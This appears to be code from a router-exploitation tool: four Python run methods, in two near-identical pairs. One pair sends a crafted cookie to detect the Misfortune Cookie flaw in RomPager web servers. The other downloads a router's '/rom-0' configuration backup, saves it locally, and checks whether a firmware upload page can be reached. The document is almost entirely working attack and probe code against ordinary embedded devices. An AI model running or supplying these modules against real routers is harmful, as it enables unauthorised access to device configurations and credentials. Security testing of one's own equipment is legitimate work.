def do_run(self, e): #httplib2.debuglevel = 1 user_agent = 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)' headers = {'User-Agent': user_agent, 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'Accept-language': 'sk,cs;q=0.8,en-US;q=0.5,en;q,0.3', 'Connection': 'keep-alive', 'Accept-Encoding': 'gzip, deflate', 'Cache-Control': 'no-cache', 'Cookie': 'C107373883=/omg1337hax'} target = 'http://' + self.host + ":" + self.port + '/blabla' h = httplib2.Http(timeout=60) h.follow_all_redirects = True try: response, content = h.request(target, 'GET', headers=headers) if response.status != 404: print_failed("Unexpected HTTP status, expecting 404 got: %d" % response.status) print_red("Device is not running RomPager") else: if 'server' in response.keys(): server = response.get('server') if re.search('RomPager', server) is not None: print_green("Got RomPager! Server:%s" % server) if re.search('omg1337hax', content.decode()) is not None: print_success("device is vulnerable to misfortune cookie") else: print_failed("test didn't pass.") print_warning("Device MAY still be vulnerable") else: print_failed("RomPager not detected, device is running: %s " % server) else: print_failed("Not running RomPager") except socket.timeout: # Is there a better way of handling timeout in httplib2? print_error("Timeout!")
def do_run(self, e): user_agent = 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)' headers = {'User-Agent': user_agent, 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'Accept-language': 'sk,cs;q=0.8,en-US;q=0.5,en;q,0.3', 'Connection': 'keep-alive', 'Accept-Encoding': 'gzip, deflate', 'Cache-Control': 'no-cache', 'Cookie': 'C107373883=/omg1337hax'} target = 'http://' + self.host + ":" + self.port + '/blabla' try: response = requests.get(target, headers=headers, timeout=60) if response.status_code != 404: print_failed("Unexpected HTTP status, expecting 404 got: %d" % response.status_code) print_red("Device is not running RomPager") else: if 'server' in response.headers: server = response.headers.get('server') if re.search('RomPager', server) is not None: print_green("Got RomPager! Server:%s" % server) if re.search('omg1337hax', response.text) is not None: print_success("device is vulnerable to misfortune cookie") else: print_failed("test didn't pass.") print_warning("Device MAY still be vulnerable") else: print_failed("RomPager not detected, device is running: %s " % server) else: print_failed("Not running RomPager") except requests.exceptions.Timeout: print_error("Timeout!") except requests.exceptions.ConnectionError: print_error("No route to host")
def do_run(self, e): target = "http://" + self.host + ":" + self.port try: response = requests.get(target + "/rom-0", timeout=60) content_type = 'application/octet-stream' if response.status_code == requests.codes.ok and response.headers.get('Content-Type') == content_type: print_success("got rom-0 file, size:" + str(len(response.content))) core.io.writefile(response.content, "rom-0") else: print_error("failed") print_info("Checking if rpFWUpload.html is available") response = requests.get(target + "/rpFWUpload.html", timeout=60) if response.status_code == requests.codes.ok: print_success("rpFWUpload.html is accessible") else: print_failed("rpFWUpload.html is not accessible") except requests.RequestException: print_error("timeout!")
def do_run(self, e): target = "http://" + self.host + ":" + self.port try: response = requests.get(target + "/rom-0", timeout=60) content_type = 'application/octet-stream' if response.status_code == requests.codes.ok and response.headers.get( 'Content-Type') == content_type: print_success("got rom-0 file, size:" + str(len(response.content))) core.io.writefile(response.content, "rom-0") else: print_error("failed") print("Checking if rpFWUpload.html is available") response = requests.get(target + "/rpFWUpload.html", timeout=60) if response.status_code == requests.codes.ok: print_success("rpFWUpload.html is accessible") else: print_failed("rpFWUpload.html is not accessible") except requests.RequestException: print_error("timeout!")